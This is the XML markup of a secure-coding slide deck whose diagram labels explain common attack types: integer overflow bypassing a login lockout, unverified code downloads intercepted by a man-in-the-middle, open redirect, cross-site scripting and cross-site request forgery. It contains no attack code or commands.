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5" r:id="rId2"/>
    <p:sldId id="278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9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1"/>
    <p:restoredTop sz="94716"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="9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2E20F-6E48-014D-9280-06447CBB8C9A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>01-Feb-19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EAD91-72FD-DF43-ADB4-7A15AC909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38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AD91-72FD-DF43-ADB4-7A15AC909A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15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AD91-72FD-DF43-ADB4-7A15AC909A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36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AD91-72FD-DF43-ADB4-7A15AC909A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57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1F34-425A-5C44-8C98-21EE88C6F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7F6B5-E67A-0C47-AE92-09F33931C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EACD1-330F-B84E-82FF-8E88677C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01-Feb-19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541D5-5173-A044-922B-E7F59723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DD6C3-EA7C-E54E-8601-39B1CB18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9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492F0-1085-B146-AE9E-D535973F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250C3-6E14-C84C-B877-FF747960B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A4806-FAB4-6140-8B53-445EFC885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01-Feb-19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DD787-5EF2-1648-8E33-EF35A8ED0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9BF03-C058-8444-89B6-04F2BFDF2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61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FAADBF-91DC-1E48-9AC4-33BCB4E7B0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297193-898B-9E4C-9ED2-8B39E09DA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052F9-58A0-0D44-91B7-B5D48C43D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01-Feb-19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7441-2128-8D41-93E3-0206FE9A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FFBB2-8760-F445-9675-D458CD8E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7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22B3-6B61-A345-B1D0-1BD04992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FDD01-F40F-014A-9F5B-E1DFF08FD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58258-CAEF-D04A-8A03-6C7E0069D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01-Feb-19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BB86E-4215-9140-B476-018881B5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96B47-A7D8-7A49-9740-B96369FB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8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13EF-7C4B-7A4F-A27B-EA8FB1CA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E67D5-5402-5C42-A600-0018C127C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AA098-3918-A144-BBA7-4D1FDB21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01-Feb-19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A4D96-16B3-404B-BD77-B75A7F600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1AD87-4D3A-244B-B620-C7FE3CEB6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ADF6-0FBB-EC49-B510-A4EFFDC68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3FEF4-D389-EF4D-9993-A7A9B2295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C6FC6-2FBD-3240-8F63-8032D54A4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B7037-9F6E-BE49-981F-6F497F7F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01-Feb-19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F924A2-83BC-6140-BDD3-B410C1FEE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C0516-6302-E145-A87F-E365DC80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88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E84B2-AE4B-AD49-BA00-95687C8F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45900-780C-1148-A32A-6CF7F242A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61063-52B1-1D46-A598-2A1C3E2422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2C714-B645-4C4B-B3D9-1F95C82EC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2A6D75-3241-6044-90D2-6845DBE014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DCA102-24EE-F04D-9883-DD24954F6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01-Feb-19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E0DCD3-3801-DF49-A288-1BEA58518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C02F1F-1BCB-2A4F-823B-6C51C176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36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246B2-6110-FC44-985A-B8C3231D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8DA805-BD42-1C4C-B765-3056E216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01-Feb-19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4B1C2A-2A3A-5A4E-A457-5C13F34DA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03D7B-03D2-CE4A-B40C-ED3690EC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12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636D3-5070-C344-99AB-41D8125A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01-Feb-19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B3E04-3CC9-5149-B7C3-411924F2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A40EF-9422-8645-9F86-946DC67E2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9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669B4-8045-264E-B4FF-A4458E1A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3A726-9B22-1B4E-9F87-433AA894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4DB9E-EB62-0B49-B373-64DE96DF9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2293C-91DF-8249-8FC1-0237232A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01-Feb-19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4E245-EAF3-1D4E-974E-4C2ED7B2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B9EDE-E930-D540-AB01-D804974F2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66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CAE44-23CB-364C-BF9C-2C2330259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01180-CDE3-AD4D-B178-E1C33C96C8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1DE6B-794E-5342-B468-7EAADDD00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FFD2A-4531-F748-B059-4F054596C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E6ED-51E7-FE45-B148-749F50E666F9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>01-Feb-19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4E80B-E8A1-554A-9B1A-34FA11368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0453C-E221-5446-AF8B-D5FAB0CA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35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75F8B-5233-A548-A638-4DFBB739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8971A-2C99-F14A-8477-E9CC9340C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059DA-5403-DD4B-9D9F-D51EB59C1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3E6ED-51E7-FE45-B148-749F50E666F9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>01-Feb-19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DC8C4-B701-F446-9D5C-6CAB9A10B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90B8-5391-C147-BC4B-F0498277E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7D754-AAA7-2641-9725-1D10B7E93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5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4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.sv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4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35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1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9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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.sv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4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.sv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23.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36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35.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.sv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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.sv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25.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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4.png"/><Relationship Id="rId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B3396E-1E9A-E24B-A722-EB9528253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58C836-1711-224B-AED4-4C117B326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7" y="678275"/>
            <a:ext cx="10515600" cy="214634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>
                    <a:alpha val="7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&lt;Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="7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Coding&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="7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6600" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="7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6600" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="7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Attack-Vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="79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A6A5AE-310D-634A-A277-FBF435420AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750517" y="3247373"/>
            <a:ext cx="11105368" cy="1274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alpha val="58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set of simple diagrams describing various attacks that leverage software flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="578133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40D4-37ED-434B-B4DA-FB641A49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511" y="484179"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflow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5A244-D130-744F-B4E8-C1CD4C985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32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3661870" y="1646559"/>
            <a:ext cx="718457" cy="8728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C44B1A-9DB9-B24C-91B6-2D3803F7C2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592977" y="2519396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/login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0E9722-3BD4-6545-8B5E-E3CAFDA1B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14153" y="1606727"/>
            <a:ext cx="9525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8C35F-DF7E-AF48-83E5-8546A687AB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901951" y="2530923"/>
            <a:ext cx="96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792179-92D7-6644-AC31-51BCECF7819A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278391" y="2852184"/>
            <a:ext cx="8744" cy="3191971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8176AA-094B-F244-B97D-1FBFB393545B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3909086" y="2854903"/>
            <a:ext cx="8745" cy="3189252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875C25-21CD-AC40-9111-CF4E82AD3D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278391" y="3234228"/>
            <a:ext cx="2630695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58890C-67DD-1643-A349-C9C13E2409BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="2904485"/>
            <a:ext cx="124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Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i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586E9-D527-0C40-AFDA-BEFC94FC93EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1270136" y="3248765"/>
            <a:ext cx="2647695" cy="853538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D4E3D0-7267-8044-B04A-CF20ED52244E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570414">
            <a:off x="1254250" y="3517724"/>
            <a:ext cx="173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Locked!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7A466A-C7AF-0042-A900-23DFAA052A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271139" y="4127355"/>
            <a:ext cx="2646692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8F86957-8B5C-D54E-AED0-6EC770AAC8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="3800999"/>
            <a:ext cx="124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Credentials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7D1613-AB66-864E-AB5C-0D75CA3F089D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269647" y="4158246"/>
            <a:ext cx="2639439" cy="868135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45333-CE45-3A4F-8D50-4ED27F2575E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563066">
            <a:off x="1254048" y="4420153"/>
            <a:ext cx="173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Account Locked!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81FA10-4CEB-CE4D-BEF1-E8A47358EB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392248" y="2512435"/>
            <a:ext cx="37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EFBA92-A614-0E42-A65B-61A6DD093CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287136" y="5035245"/>
            <a:ext cx="2630695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B38CB2-A7DD-BD42-B4CA-FB63B60ADB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="4698399"/>
            <a:ext cx="124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Credentials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15BD8F-F798-F449-A53C-628201CF1B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269647" y="5080681"/>
            <a:ext cx="2639439" cy="768156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A6FF4D-F96F-1E46-BA81-19B3E796AF71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638428">
            <a:off x="1219713" y="5280093"/>
            <a:ext cx="182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authorized!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2657D0-7C0E-3F4F-AEA0-3294BE280A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084023" y="3942689"/>
            <a:ext cx="3570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Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ttempts = 32767 (MAX_SHORT)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4DB7A3-2970-7048-A400-E71BD3F0E437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084023" y="4850579"/>
            <a:ext cx="4276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A94442"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A94442"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ttempts = -32768 (&lt; MAX_ATTEMPTS)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077D48-CBC1-E243-B376-9523BB2C404E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4117524" y="3054395"/>
            <a:ext cx="200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0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>attempts = 32766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8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51715C61-952D-8E41-95AA-3E098908E3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="5"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116212" y="2159140"/>
            <a:ext cx="12700" cy="3012165"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26443299"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="50000"/>
                <a:alpha val="3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019F278-5918-4844-9360-D0F6379D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97" y="59092"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download of Code Without </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity Check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8744EB57-9B28-1E47-9B45-665580CDC03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245654" y="1602634"/>
            <a:ext cx="870558" cy="1330651"/>
          </a:xfrm>
          <a:prstGeom prst="cub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135DD-8E7A-8041-9988-8EFDED062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10" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555739" y="1881409"/>
            <a:ext cx="718457" cy="87283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2602973-A5BC-3E44-AA7D-E379A474E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63712" y="4695055"/>
            <a:ext cx="952500" cy="95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5590B4-4ED1-FF48-9D1D-82FDFE5F903B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331223" y="565425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BCB06-6F8D-9942-B678-33D0B5995107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398690" y="2754246"/>
            <a:ext cx="102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5A33F9F-A32F-E540-A42C-9D07A416B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411836" y="3188972"/>
            <a:ext cx="952500" cy="952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8ED64E-B341-1642-843D-A9FBF87B9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10" t="61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555739" y="4478508"/>
            <a:ext cx="718457" cy="9262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EA79ED-CBF7-BB49-8052-48FFDEC69A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3405904" y="5325849"/>
            <a:ext cx="1011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9CB3F3-206D-4946-8128-7B6D87BE8FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="979584" y="2939980"/>
            <a:ext cx="1849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Download Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Not Secure)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FAB52-A2FE-9848-AE0A-ECC0CA43FFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377739" y="3300489"/>
            <a:ext cx="955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Man-in-the-middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236556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68957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Open Redirect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21913-DCA6-2749-BF68-9D3623614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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230441" y="1460277"/>
            <a:ext cx="718457" cy="92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32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507314" y="1431834"/>
            <a:ext cx="718457" cy="872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915106" y="2275091"/>
            <a:ext cx="19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www.trusted.good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9C724-D387-0645-AD03-15F0B8D33AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840168" y="2330822"/>
            <a:ext cx="150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www.evil.bad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30441" y="3651660"/>
            <a:ext cx="952500" cy="9525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143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1410453" y="3469666"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="15038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E9B8A2A-1A9D-7742-A5FF-32C355FA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3270576-9AC6-5147-9955-7029A4B4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41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020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Regular Users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4181420" y="4604160"/>
            <a:ext cx="105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E71BF70E-D78E-A54F-90D0-4E93C36FAC3D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>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1475993" y="3055134"/>
            <a:ext cx="825243" cy="3823"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3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B146178-72F2-974B-BB4F-8808455E4F27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rot="5400000" flipH="1" flipV="1">
            <a:off x="2699979" y="1113961"/>
            <a:ext cx="721008" cy="2339915"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31706"/>
              <a:gd name="adj2" fmla="val 70843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6AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="19" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2698393" y="4127910"/>
            <a:ext cx="1532049" cy="1336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ED7DDE3-48F9-A349-B146-4C9BC97FFCC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001873" y="4183641"/>
            <a:ext cx="104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Phishing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E-mail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868551A-88CA-5C44-A00B-37F5392982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192637" y="3595929"/>
            <a:ext cx="531981" cy="5319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2583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5C997FDC-BF7F-2D43-9D94-DADC0687A70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3121919" y="2851625"/>
            <a:ext cx="851348" cy="1600363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3228418" y="1512458"/>
            <a:ext cx="1605449" cy="1950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948" y="523351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Cross-Site Scripting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3192325" y="1228465"/>
            <a:ext cx="19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www.trusted.good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005852" y="4450653"/>
            <a:ext cx="952500" cy="9525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143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2310230" y="4268659"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="15038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E9B8A2A-1A9D-7742-A5FF-32C355FA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3270576-9AC6-5147-9955-7029A4B4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41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020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Regular Users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4956831" y="5403153"/>
            <a:ext cx="105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6AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4212781" y="3181332"/>
            <a:ext cx="1599027" cy="939616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6F328B50-780E-0843-A476-174A2D6C54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t="50875" r="83807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973267" y="2496949"/>
            <a:ext cx="569219" cy="709353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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54BFB6DF-C3EE-3545-BFE3-82D42039A13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="1"/>
            <a:endCxn id="54" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1592178" y="2487669"/>
            <a:ext cx="718053" cy="2257240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73E3D49-ECEB-B84F-BA98-35B0F2D4E826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742384" y="3515154"/>
            <a:ext cx="105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214F5F5-9385-3342-8603-31907DBE7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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232948" y="1561394"/>
            <a:ext cx="718457" cy="9262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76AE792-A9B2-5946-A45D-EE0E0BE3BA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1224005"/>
            <a:ext cx="150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www.evil.bad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1946829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2069219" y="1383243"/>
            <a:ext cx="1605449" cy="1950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651" y="361428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Cross-Site Request Forgery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1921706" y="1038954"/>
            <a:ext cx="19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www.trusted.good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386322" y="4321438"/>
            <a:ext cx="952500" cy="9525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143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1151031" y="4139444"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="15038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E9B8A2A-1A9D-7742-A5FF-32C355FA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3270576-9AC6-5147-9955-7029A4B4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41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020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Regular Users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4386322" y="5233760"/>
            <a:ext cx="105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6AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="35" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3143807" y="2602673"/>
            <a:ext cx="1962985" cy="1474546"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/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640274FF-491E-9140-A9EA-E5F0EA7B72D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-3" t="-154" r="83694" b="49654"/>
